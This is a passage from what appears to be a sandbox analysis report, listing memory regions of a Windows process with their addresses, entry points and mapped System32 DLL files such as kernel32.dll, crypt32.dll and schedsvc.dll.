	        filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")

Region:
	              id = 2888
	        start_va = 0x7ff950700000
	          end_va = 0x7ff95071efff
	       monitored = 0
	     entry_point = 0x7ff950704960
	     region_type = mapped_file
	            name = "ncprov.dll"
	        filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")

Region:
	              id = 2889
	        start_va = 0x7ff9509e0000
	          end_va = 0x7ff950a72fff
	       monitored = 0
	     entry_point = 0x7ff9509e9680
	     region_type = mapped_file
	            name = "msvcp_win.dll"
	        filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")

Region:
	              id = 2890
	        start_va = 0x7ff950b90000
	          end_va = 0x7ff950ba8fff
	       monitored = 0
	     entry_point = 0x7ff950b94520
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")

Region:
	              id = 2891
	        start_va = 0x7ff951160000
	          end_va = 0x7ff951227fff
	       monitored = 0
	     entry_point = 0x7ff9511a13f0
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 2892
	        start_va = 0x7ff951230000
	          end_va = 0x7ff951290fff
	       monitored = 0
	     entry_point = 0x7ff951234b50
	     region_type = mapped_file
	            name = "wlanapi.dll"
	        filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")

Region:
	              id = 2893
	        start_va = 0x7ff9512a0000
	          end_va = 0x7ff95141bfff
	       monitored = 0
	     entry_point = 0x7ff9512f1650
	     region_type = mapped_file
	            name = "locationframework.dll"
	        filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")

Region:
	              id = 2894
	        start_va = 0x7ff951420000
	          end_va = 0x7ff95142afff
	       monitored = 0
	     entry_point = 0x7ff951421770
	     region_type = mapped_file
	            name = "lfsvc.dll"
	        filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")

Region:
	              id = 2895
	        start_va = 0x7ff9515e0000
	          end_va = 0x7ff9516c5fff
	       monitored = 0
	     entry_point = 0x7ff9515fcf10
	     region_type = mapped_file
	            name = "usermgr.dll"
	        filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")

Region:
	              id = 2896
	        start_va = 0x7ff951a70000
	          end_va = 0x7ff951df1fff
	       monitored = 0
	     entry_point = 0x7ff951ac1220
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 2897
	        start_va = 0x7ff951e00000
	          end_va = 0x7ff951f35fff
	       monitored = 0
	     entry_point = 0x7ff951e2f350
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")

Region:
	              id = 2898
	        start_va = 0x7ff953030000
	          end_va = 0x7ff95313dfff
	       monitored = 0
	     entry_point = 0x7ff95307eaa0
	     region_type = mapped_file
	            name = "mrmcorer.dll"
	        filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")

Region:
	              id = 2899
	        start_va = 0x7ff953440000
	          end_va = 0x7ff953456fff
	       monitored = 0
	     entry_point = 0x7ff953445630
	     region_type = mapped_file
	            name = "sens.dll"
	        filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")

Region:
	              id = 2900
	        start_va = 0x7ff9534b0000
	          end_va = 0x7ff9534edfff
	       monitored = 0
	     entry_point = 0x7ff9534ba050
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")

Region:
	              id = 2901
	        start_va = 0x7ff9534f0000
	          end_va = 0x7ff953516fff
	       monitored = 0
	     entry_point = 0x7ff9534f3bf0
	     region_type = mapped_file
	            name = "profsvcext.dll"
	        filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")

Region:
	              id = 2902
	        start_va = 0x7ff953520000
	          end_va = 0x7ff953532fff
	       monitored = 0
	     entry_point = 0x7ff9535257f0
	     region_type = mapped_file
	            name = "themeservice.dll"
	        filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")

Region:
	              id = 2903
	        start_va = 0x7ff953540000
	          end_va = 0x7ff9535b9fff
	       monitored = 0
	     entry_point = 0x7ff953567630
	     region_type = mapped_file
	            name = "es.dll"
	        filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")

Region:
	              id = 2904
	        start_va = 0x7ff953600000
	          end_va = 0x7ff953691fff
	       monitored = 0
	     entry_point = 0x7ff95364a780
	     region_type = mapped_file
	            name = "msvcp110_win.dll"
	        filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")

Region:
	              id = 2905
	        start_va = 0x7ff953720000
	          end_va = 0x7ff95374dfff
	       monitored = 0
	     entry_point = 0x7ff953727550
	     region_type = mapped_file
	            name = "netjoin.dll"
	        filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")

Region:
	              id = 2906
	        start_va = 0x7ff953750000
	          end_va = 0x7ff953765fff
	       monitored = 0
	     entry_point = 0x7ff953751b60
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 2907
	        start_va = 0x7ff953770000
	          end_va = 0x7ff9537d3fff
	       monitored = 0
	     entry_point = 0x7ff953785ae0
	     region_type = mapped_file
	            name = "wevtapi.dll"
	        filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")

Region:
	              id = 2908
	        start_va = 0x7ff9537e0000
	          end_va = 0x7ff953834fff
	       monitored = 0
	     entry_point = 0x7ff9537efc00
	     region_type = mapped_file
	            name = "profsvc.dll"
	        filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")

Region:
	              id = 2909
	        start_va = 0x7ff953a10000
	          end_va = 0x7ff953a1efff
	       monitored = 0
	     entry_point = 0x7ff953a14960
	     region_type = mapped_file
	            name = "nci.dll"
	        filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")

Region:
	              id = 2910
	        start_va = 0x7ff953a20000
	          end_va = 0x7ff953a2cfff
	       monitored = 0
	     entry_point = 0x7ff953a22ca0
	     region_type = mapped_file
	            name = "csystemeventsbrokerclient.dll"
	        filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")

Region:
	              id = 2911
	        start_va = 0x7ff953a30000
	          end_va = 0x7ff953a5efff
	       monitored = 0
	     entry_point = 0x7ff953a38910
	     region_type = mapped_file
	            name = "wptaskscheduler.dll"
	        filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")

Region:
	              id = 2912
	        start_va = 0x7ff953a60000
	          end_va = 0x7ff953a6ffff
	       monitored = 0
	     entry_point = 0x7ff953a62c60
	     region_type = mapped_file
	            name = "usermgrcli.dll"
	        filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")

Region:
	              id = 2913
	        start_va = 0x7ff953a70000
	          end_va = 0x7ff953addfff
	       monitored = 0
	     entry_point = 0x7ff953a77f60
	     region_type = mapped_file
	            name = "taskcomp.dll"
	        filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")

Region:
	              id = 2914
	        start_va = 0x7ff953ae0000
	          end_va = 0x7ff953af0fff
	       monitored = 0
	     entry_point = 0x7ff953ae3320
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 2915
	        start_va = 0x7ff953b00000
	          end_va = 0x7ff953b40fff
	       monitored = 0
	     entry_point = 0x7ff953b17eb0
	     region_type = mapped_file
	            name = "ubpm.dll"
	        filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")

Region:
	              id = 2916
	        start_va = 0x7ff953b50000
	          end_va = 0x7ff953c4bfff
	       monitored = 0
	     entry_point = 0x7ff953b86df0
	     region_type = mapped_file
	            name = "schedsvc.dll"
	        filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")

Region:
	              id = 2917
	        start_va = 0x7ff953c50000
	          end_va = 0x7ff953d0efff
	       monitored = 0
	     entry_point = 0x7ff953c71c50
	     region_type = mapped_file
	            name = "taskschd.dll"
	        filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")

Region:
	              id = 2918
	        start_va = 0x7ff953d40000
	          end_va = 0x7ff953d75fff
	       monitored = 0
	     entry_point = 0x7ff953d50070
	     region_type = mapped_file
	            name = "xmllite.dll"
	        filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")

Region:
	              id = 2919
	        start_va = 0x7ff954620000
	          end_va = 0x7ff954629fff
	       monitored = 0
	     entry_point = 0x7ff954621660
	     region_type = mapped_file
	            name = "dsrole.dll"
	        filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")

Region:
	              id = 2920
	        start_va = 0x7ff954630000
	          end_va = 0x7ff954647fff
	       monitored = 0
	     entry_point = 0x7ff954635910
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")

Region:
	              id = 2921
	        start_va = 0x7ff954650000
	          end_va = 0x7ff95479cfff
	       monitored = 0
	     entry_point = 0x7ff954693da0
	     region_type = mapped_file
	            name = "gpsvc.dll"
	        filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")

Region:
	              id = 2922
	        start_va = 0x7ff954a70000
	          end_va = 0x7ff954a77fff
	       monitored = 0
	     entry_point = 0x7ff954a713b0
	     region_type = mapped_file
	            name = "dmiso8601utils.dll"
	        filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")

Region:
	              id = 2923
	        start_va = 0x7ff954a80000
	          end_va = 0x7ff954a91fff
	       monitored = 0
	     entry_point = 0x7ff954a81a80
	     region_type = mapped_file
	            name = "bitsproxy.dll"
	        filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")

Region:
	              id = 2924
	        start_va = 0x7ff954aa0000
	          end_va = 0x7ff954ab3fff
	       monitored = 0
	     entry_point = 0x7ff954aa2a00
	     region_type = mapped_file
	            name = "bitsigd.dll"
	        filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")

Region:
	              id = 2925
	        start_va = 0x7ff954b60000
	          end_va = 0x7ff954ff2fff
	       monitored = 0
	     entry_point = 0x7ff954b6f760
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")

Region:
	              id = 2926
	        start_va = 0x7ff955000000
	          end_va = 0x7ff955066fff
	       monitored = 0
	     entry_point = 0x7ff95501e710
	     region_type = mapped_file
	            name = "bcp47langs.dll"
	        filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")

Region:
	              id = 2927
	        start_va = 0x7ff955920000
	          end_va = 0x7ff955927fff
	       monitored = 0
	     entry_point = 0x7ff9559213e0
	     region_type = mapped_file
	            name = "dabapi.dll"
	        filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")

Region:
	              id = 2928
	        start_va = 0x7ff955930000
	          end_va = 0x7ff9559a8fff
	       monitored = 0
	     entry_point = 0x7ff95594fb90
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")

Region:
	              id = 2929
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 2930
	        start_va = 0x7ff955b40000
	          end_va = 0x7ff955b5bfff
	       monitored = 0
	     entry_point = 0x7ff955b437a0
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")

Region:
	              id = 2931
	        start_va = 0x7ff955b60000
	          end_va = 0x7ff955b6afff
	       monitored = 0
	     entry_point = 0x7ff955b61de0
	     region_type = mapped_file
	            name = "bitsperf.dll"
	        filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")

Region:
	              id = 2932
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 2933
	        start_va = 0x7ff955d40000
	          end_va = 0x7ff955d7ffff
	       monitored = 0
	     entry_point = 0x7ff955d51960
	     region_type = mapped_file
	            name = "brokerlib.dll"
	        filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")

Region:
	              id = 2934
	        start_va = 0x7ff955ed0000
	          end_va = 0x7ff955ef6fff
	       monitored = 0
	     entry_point = 0x7ff955ed7940
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 2935
	        start_va = 0x7ff955f00000
	          end_va = 0x7ff955fa9fff
	       monitored = 0
	     entry_point = 0x7ff955f27910
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 2936
	        start_va = 0x7ff955fb0000
	          end_va = 0x7ff9560affff
	       monitored = 0
	     entry_point = 0x7ff955ff0f80
	     region_type = mapped_file
	            name = "twinapi.appcore.dll"
	        filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")

Region:
	              id = 2937
	        start_va = 0x7ff956140000
	          end_va = 0x7ff95614bfff
	       monitored = 0
	     entry_point = 0x7ff956142480
	     region_type = mapped_file
	            name = "sysntfy.dll"
	        filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")

Region:
	              id = 2938
	        start_va = 0x7ff956310000
	          end_va = 0x7ff956341fff
	       monitored = 0
	     entry_point = 0x7ff956322340
	     region_type = mapped_file
	            name = "fwbase.dll"
	        filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")

Region:
	              id = 2939
	        start_va = 0x7ff956480000
	          end_va = 0x7ff95648bfff
	       monitored = 0
	     entry_point = 0x7ff956482790
	     region_type = mapped_file
	            name = "hid.dll"
	        filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")

Region:
	              id = 2940
	        start_va = 0x7ff956490000
	          end_va = 0x7ff9564b3fff
	       monitored = 0
	     entry_point = 0x7ff956493260
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 2941
	        start_va = 0x7ff956630000
	          end_va = 0x7ff956723fff
	       monitored = 0
	     entry_point = 0x7ff95663a960
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 2942
	        start_va = 0x7ff956780000
	          end_va = 0x7ff9567c8fff
	       monitored = 0
	     entry_point = 0x7ff95678a090
	     region_type = mapped_file
	            name = "authz.dll"
	        filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")

Region:
	              id = 2943
	        start_va = 0x7ff9568a0000
	          end_va = 0x7ff9568abfff
	       monitored = 0
	     entry_point = 0x7ff9568a27e0
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 2944
	        start_va = 0x7ff956980000
	          end_va = 0x7ff9569b0fff
	       monitored = 0
	     entry_point = 0x7ff956987d10
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 2945
	        start_va = 0x7ff9569e0000
	          end_va = 0x7ff956a59fff
	       monitored = 0
	     entry_point = 0x7ff956a01a50
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 2946
	        start_va = 0x7ff956aa0000
	          end_va = 0x7ff956ad3fff
	       monitored = 0
	     entry_point = 0x7ff956abae70
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 2947
	        start_va = 0x7ff956ae0000
	          end_va = 0x7ff956ae9fff
	       monitored = 0
	     entry_point = 0x7ff956ae1830
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")

Region:
	              id = 2948
	        start_va = 0x7ff956bf0000
	          end_va = 0x7ff956c0efff
	       monitored = 0
	     entry_point = 0x7ff956bf5d30
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")

Region:
	              id = 2949
	        start_va = 0x7ff956d60000
	          end_va = 0x7ff956dbbfff
	       monitored = 0
	     entry_point = 0x7ff956d76f70
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 2950
	        start_va = 0x7ff956e10000
	          end_va = 0x7ff956e26fff
	       monitored = 0
	     entry_point = 0x7ff956e179d0
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 2951
	        start_va = 0x7ff956f30000
	          end_va = 0x7ff956f3afff
	       monitored = 0
	     entry_point = 0x7ff956f319a0
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 2952
	        start_va = 0x7ff956f70000
	          end_va = 0x7ff956f90fff
	       monitored = 0
	     entry_point = 0x7ff956f80250
	     region_type = mapped_file
	            name = "joinutil.dll"
	        filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")

Region:
	              id = 2953
	        start_va = 0x7ff956fc0000
	          end_va = 0x7ff956ff9fff
	       monitored = 0
	     entry_point = 0x7ff956fc8d20
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 2954
	        start_va = 0x7ff957000000
	          end_va = 0x7ff957026fff
	       monitored = 0
	     entry_point = 0x7ff957010aa0
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 2955
	        start_va = 0x7ff957110000
	          end_va = 0x7ff95713cfff
	       monitored = 0
	     entry_point = 0x7ff957129d40
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 2956
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 2957
	        start_va = 0x7ff957300000
	          end_va = 0x7ff957318fff
	       monitored = 0
	     entry_point = 0x7ff957305e10
	     region_type = mapped_file
	            name = "eventaggregation.dll"
	        filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")

Region:
	              id = 2958
	        start_va = 0x7ff957320000
	          end_va = 0x7ff957348fff
	       monitored = 0
	     entry_point = 0x7ff957334530
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 2959
	        start_va = 0x7ff957350000
	          end_va = 0x7ff9573e8fff
	       monitored = 0
	     entry_point = 0x7ff95737f4e0
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 2960
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 2961
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2962
	        start_va = 0x7ff9574c0000
	          end_va = 0x7ff9574cffff
	       monitored = 0
	     entry_point = 0x7ff9574c56e0
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 2963
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 2964
	        start_va = 0x7ff957520000
	          end_va = 0x7ff9575a5fff
	       monitored = 0
	     entry_point = 0x7ff95752d8f0
	     region_type = mapped_file
	            name = "firewallapi.dll"
	        filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")

Region:
	              id = 2965
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2966
	        start_va = 0x7ff9577a0000
	          end_va = 0x7ff9577f4fff
	       monitored = 0
	     entry_point = 0x7ff9577b7970
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 2967
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 2968
	        start_va = 0x7ff957e50000
	          end_va = 0x7ff958016fff
	       monitored = 0
	     entry_point = 0x7ff957eadb80
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 2969
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 2970
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 2971
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2972
	        start_va = 0x7ff958250000
	          end_va = 0x7ff958266fff
	       monitored = 0
	     entry_point = 0x7ff958251390
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")

Region:
	              id = 2973
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 2974
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2975
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2976
	        start_va = 0x7ff958740000
	          end_va = 0x7ff9587aafff
	       monitored = 0
	     entry_point = 0x7ff9587590c0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 2977
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 2978
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2979
	        start_va = 0x7ff958980000
	          end_va = 0x7ff9589dbfff
	       monitored = 0
	     entry_point = 0x7ff95899b720
	     region_type = mapped_file
	            name = "wldap32.dll"
	        filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")

Region:
	              id = 2980
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2981
	        start_va = 0x7ff958c70000
	          end_va = 0x7ff959098fff
	       monitored = 0
	     entry_point = 0x7ff958c98740
	     region_type = mapped_file
	            name = "setupapi.dll"
	        filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")

Region:
	              id = 2982
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2983
	        start_va = 0x7ff959170000
	          end_va = 0x7ff959216fff
	       monitored = 0
	     entry_point = 0x7ff95917b4d0
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 2984
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
